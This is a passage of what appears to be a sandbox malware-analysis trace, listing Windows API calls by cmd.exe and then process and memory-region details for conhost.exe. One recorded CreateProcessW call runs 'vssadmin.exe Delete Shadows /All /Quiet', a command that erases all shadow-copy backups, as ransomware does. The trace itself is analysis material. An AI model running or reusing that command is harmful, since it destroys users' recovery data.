	[0233.264] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0233.265] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0233.266] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0233.267] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0233.268] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0233.268] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0233.268] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0233.268] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0233.268] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0233.268] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0233.268] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0233.269] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0233.270] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0233.270] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0233.270] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0233.270] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0233.270] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0233.270] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0233.270] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0233.272] GetProcessHeap () returned 0x4670000
	[0233.272] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x210) returned 0x4679098
	[0233.272] GetProcessHeap () returned 0x4670000
	[0233.272] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x5a) returned 0x46792b0
	[0233.272] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0233.273] GetProcessHeap () returned 0x4670000
	[0233.273] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x418) returned 0x46705c8
	[0233.273] SetErrorMode (uMode=0x0) returned 0x0
	[0233.274] SetErrorMode (uMode=0x1) returned 0x0
	[0233.274] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46705d0, lpFilePart=0x18f30c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f30c*="Desktop") returned 0x1d
	[0233.274] SetErrorMode (uMode=0x0) returned 0x1
	[0233.274] GetProcessHeap () returned 0x4670000
	[0233.274] RtlReAllocateHeap (Heap=0x4670000, Flags=0x0, Ptr=0x46705c8, Size=0x5e) returned 0x46705c8
	[0233.274] GetProcessHeap () returned 0x4670000
	[0233.274] RtlSizeHeap (HeapHandle=0x4670000, Flags=0x0, MemoryPointer=0x46705c8) returned 0x5e
	[0233.275] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0233.275] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0233.275] GetProcessHeap () returned 0x4670000
	[0233.275] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x182) returned 0x4679318
	[0233.275] GetProcessHeap () returned 0x4670000
	[0233.275] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x2fc) returned 0x4670630
	[0233.617] GetProcessHeap () returned 0x4670000
	[0233.617] RtlReAllocateHeap (Heap=0x4670000, Flags=0x0, Ptr=0x4670630, Size=0x184) returned 0x4670630
	[0233.617] GetProcessHeap () returned 0x4670000
	[0233.617] RtlSizeHeap (HeapHandle=0x4670000, Flags=0x0, MemoryPointer=0x4670630) returned 0x184
	[0233.617] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0233.617] GetProcessHeap () returned 0x4670000
	[0233.617] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0xe0) returned 0x46794a8
	[0233.623] GetProcessHeap () returned 0x4670000
	[0233.623] RtlReAllocateHeap (Heap=0x4670000, Flags=0x0, Ptr=0x46794a8, Size=0x76) returned 0x46794a8
	[0233.623] GetProcessHeap () returned 0x4670000
	[0233.623] RtlSizeHeap (HeapHandle=0x4670000, Flags=0x0, MemoryPointer=0x46794a8) returned 0x76
	[0233.624] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0233.625] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f0b8) returned 0xffffffff
	[0233.626] GetLastError () returned 0x2
	[0233.626] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.exe.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.exe.*"), fInfoLevelId=0x1, lpFindFileData=0x18f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f098) returned 0xffffffff
	[0233.626] GetLastError () returned 0x2
	[0233.626] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0233.627] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.exe" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f0b8) returned 0xffffffff
	[0233.629] GetLastError () returned 0x2
	[0233.629] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.exe.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.exe.*"), fInfoLevelId=0x1, lpFindFileData=0x18f098, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f098) returned 0xffffffff
	[0233.629] GetLastError () returned 0x2
	[0233.629] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0233.630] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f0b8) returned 0x4679528
	[0233.630] GetProcessHeap () returned 0x4670000
	[0233.630] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x0, Size=0x14) returned 0x4677830
	[0233.630] FindClose (in: hFindFile=0x4679528 | out: hFindFile=0x4679528) returned 1
	[0233.630] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0233.630] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0233.631] GetConsoleTitleW (in: lpConsoleTitle=0x18f58c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0234.101] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f4b8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f49c | out: lpAttributeList=0x18f4b8, lpSize=0x18f49c) returned 1
	[0234.101] UpdateProcThreadAttribute (in: lpAttributeList=0x18f4b8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f4a4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f4b8, lpPreviousValue=0x0) returned 1
	[0234.101] GetStartupInfoW (in: lpStartupInfo=0x18f4f0 | out: lpStartupInfo=0x18f4f0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0234.102] GetProcessHeap () returned 0x4670000
	[0234.102] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x18) returned 0x46779d0
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0234.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.103] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0234.104] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0234.105] GetProcessHeap () returned 0x4670000
	[0234.105] RtlFreeHeap (HeapHandle=0x4670000, Flags=0x0, BaseAddress=0x46779d0) returned 1
	[0234.105] GetProcessHeap () returned 0x4670000
	[0234.105] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0xa) returned 0x4679528
	[0234.105] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0234.109] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe  Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18f440*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe  Delete Shadows /All /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f48c | out: lpCommandLine="vssadmin.exe  Delete Shadows /All /Quiet", lpProcessInformation=0x18f48c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xf50, dwThreadId=0xf64)) returned 1
	[0234.375] CloseHandle (hObject=0xa4) returned 1
	[0234.375] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0234.375] GetProcessHeap () returned 0x4670000
	[0234.375] RtlFreeHeap (HeapHandle=0x4670000, Flags=0x0, BaseAddress=0x467b850) returned 1
	[0234.375] GetEnvironmentStringsW () returned 0x467a140*
	[0234.375] GetProcessHeap () returned 0x4670000
	[0234.375] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0xb9c) returned 0x467ace8
	[0234.375] memcpy (in: _Dst=0x467ace8, _Src=0x467a140, _Size=0xb9c | out: _Dst=0x467ace8) returned 0x467ace8
	[0234.375] FreeEnvironmentStringsA (penv="=") returned 1
	[0234.376] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0255.176] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18f424 | out: lpExitCode=0x18f424*=0x2) returned 1
	[0255.178] CloseHandle (hObject=0xa8) returned 1
	[0255.179] _vsnwprintf (in: _Buffer=0x18f50c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f42c | out: _Buffer="00000002") returned 8
	[0255.180] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0255.181] GetProcessHeap () returned 0x4670000
	[0255.181] RtlFreeHeap (HeapHandle=0x4670000, Flags=0x0, BaseAddress=0x467ace8) returned 1
	[0255.181] GetEnvironmentStringsW () returned 0x467a140*
	[0255.181] GetProcessHeap () returned 0x4670000
	[0255.181] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0xbc2) returned 0x467c460
	[0255.182] memcpy (in: _Dst=0x467c460, _Src=0x467a140, _Size=0xbc2 | out: _Dst=0x467c460) returned 0x467c460
	[0255.182] FreeEnvironmentStringsA (penv="=") returned 1
	[0255.182] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0255.182] GetProcessHeap () returned 0x4670000
	[0255.182] RtlFreeHeap (HeapHandle=0x4670000, Flags=0x0, BaseAddress=0x467c460) returned 1
	[0255.182] GetEnvironmentStringsW () returned 0x467a140*
	[0255.182] GetProcessHeap () returned 0x4670000
	[0255.182] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0xbc2) returned 0x467c460
	[0255.182] memcpy (in: _Dst=0x467c460, _Src=0x467a140, _Size=0xbc2 | out: _Dst=0x467c460) returned 0x467c460
	[0255.182] FreeEnvironmentStringsA (penv="=") returned 1
	[0255.182] GetProcessHeap () returned 0x4670000
	[0255.183] RtlFreeHeap (HeapHandle=0x4670000, Flags=0x0, BaseAddress=0x4679528) returned 1
	[0255.183] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f4b8 | out: lpAttributeList=0x18f4b8) 
	[0255.183] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0255.183] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0255.243] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0255.243] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0255.290] _get_osfhandle (_FileHandle=0) returned 0x38
	[0255.290] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0255.370] SetConsoleInputExeNameW () returned 0x1
	[0255.371] GetConsoleOutputCP () returned 0x1b5
	[0255.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0255.533] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0255.734] exit (_Code=2) 

Thread:
	id = 38
	os_tid = 0xe6c


Process:
	id = "3"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x34775000"
	os_pid = "0x12e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0xd78"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 429
	        start_va = 0x3000000
	          end_va = 0x31fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000003000000"
	        filename = ""

Region:
	              id = 430
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 431
	        start_va = 0x6102e10000
	          end_va = 0x6102e4ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006102e10000"
	        filename = ""

Region:
	              id = 432
	        start_va = 0x6103000000
	          end_va = 0x61031fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006103000000"
	        filename = ""

Region:
	              id = 433
	        start_va = 0x1d48afa0000
	          end_va = 0x1d48afbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48afa0000"
	        filename = ""

Region:
	              id = 434
	        start_va = 0x1d48afc0000
	          end_va = 0x1d48afd4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48afc0000"
	        filename = ""

Region:
	              id = 435
	        start_va = 0x7df5ff460000
	          end_va = 0x7ff5ff45ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff460000"
	        filename = ""

Region:
	              id = 436
	        start_va = 0x7ff7fecd0000
	          end_va = 0x7ff7fecf2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fecd0000"
	        filename = ""

Region:
	              id = 437
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 438
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 439
	        start_va = 0x1d48afe0000
	          end_va = 0x1d48b22ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48afe0000"
	        filename = ""

Region:
	              id = 440
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 441
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 442
	        start_va = 0x1d48afa0000
	          end_va = 0x1d48afaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48afa0000"
	        filename = ""

Region:
	              id = 443
	        start_va = 0x7ff7febd0000
	          end_va = 0x7ff7feccffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7febd0000"
	        filename = ""

Region:
	              id = 444
	        start_va = 0x1d48afe0000
	          end_va = 0x1d48b09dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 445
	        start_va = 0x1d48b130000
	          end_va = 0x1d48b22ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b130000"
	        filename = ""

Region:
	              id = 446
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 447
	        start_va = 0x6102e50000
	          end_va = 0x6102e8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006102e50000"
	        filename = ""

Region:
	              id = 448
	        start_va = 0x1d48b230000
	          end_va = 0x1d48b2cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48b230000"
	        filename = ""

Region:
	              id = 449
	        start_va = 0x1d48afb0000
	          end_va = 0x1d48afb6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001d48afb0000"
	        filename = ""

Region:
	              id = 452
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 453
	        start_va = 0x1d48b0a0000
	          end_va = 0x1d48b0a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001d48b0a0000"
	        filename = ""

Region:
	              id = 454
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 455
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 456
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 457
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 476
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 479
	        start_va = 0x1d48b0b0000
	          end_va = 0x1d48b0b6fff
